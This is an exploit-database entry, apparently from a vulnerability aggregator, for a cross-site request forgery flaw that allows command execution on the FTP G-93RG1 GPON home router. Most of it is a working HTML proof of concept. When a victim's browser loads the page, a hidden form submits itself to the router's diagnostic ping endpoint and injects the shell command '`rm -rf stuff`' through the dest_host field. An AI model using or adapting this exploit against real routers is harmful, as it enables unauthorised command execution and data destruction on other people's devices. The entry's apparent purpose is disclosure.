GPON Home Router FTP G-93RG1 - Cross-Site Request Forgery Command Execution

🗓️ 02 Sep 2015 00:00:00Reported by Phan Thanh DuyType

exploitpack👁 13 Views

GPON Home Router FTP G-93RG1 - Cross-Site Request Forgery Command Execution vulnerability on Firmware Version 3.0.0 Build 12053

<!--
######################################################################
# Exploit Title: GPON Home CSRF With Command ExecuteVulnerability
# Author: Phan Thanh Duy (logicaway) - KAISAI12 (ceh.vn)
# E-mail:(facebook https://www.facebook.com/duy.phanthanh.75),(
https://www.facebook.com/kai.sai.35)
# Category: Hardware
# Google Dork: N/A
# Vendor: FTP Viet Nam
# Firmware Version: 3.0.0 Build 120531
# Product: FTP G-93RG1
#
#
# Tested on: Windows 8 64-bit
######################################################################

#Introduction
==============

#Description of Vulnerability
=============================
Execute command with CSRF

#Exploit
========
-->

<html>
<head>
<title>CSRF Demo Exploit</title>
</head>
<body>

<form name="auto" method="POST"
action="http://192.168.1.1/GponForm/diag_XForm"
enctype="multipart/form-data">
<input type="hidden" name="XWebPageName" value="diag"/>
<input type="hidden" name="diag_action" value="ping"/>
<input type="hidden" name="wan_conlist" value="0"/>
<input type="hidden" name="dest_host" value="`rm -rf stuff`"/>
<input type="hidden" name="ipver" value="0"/>
<!-- input type="submit" name="submit"/> -->
</form>
<script type="text/javascript">
      document.auto.submit();
</script>
</body>
</html>

02 Sep 2015 00:00Current

0.3Low risk

Vulners AI Score0.3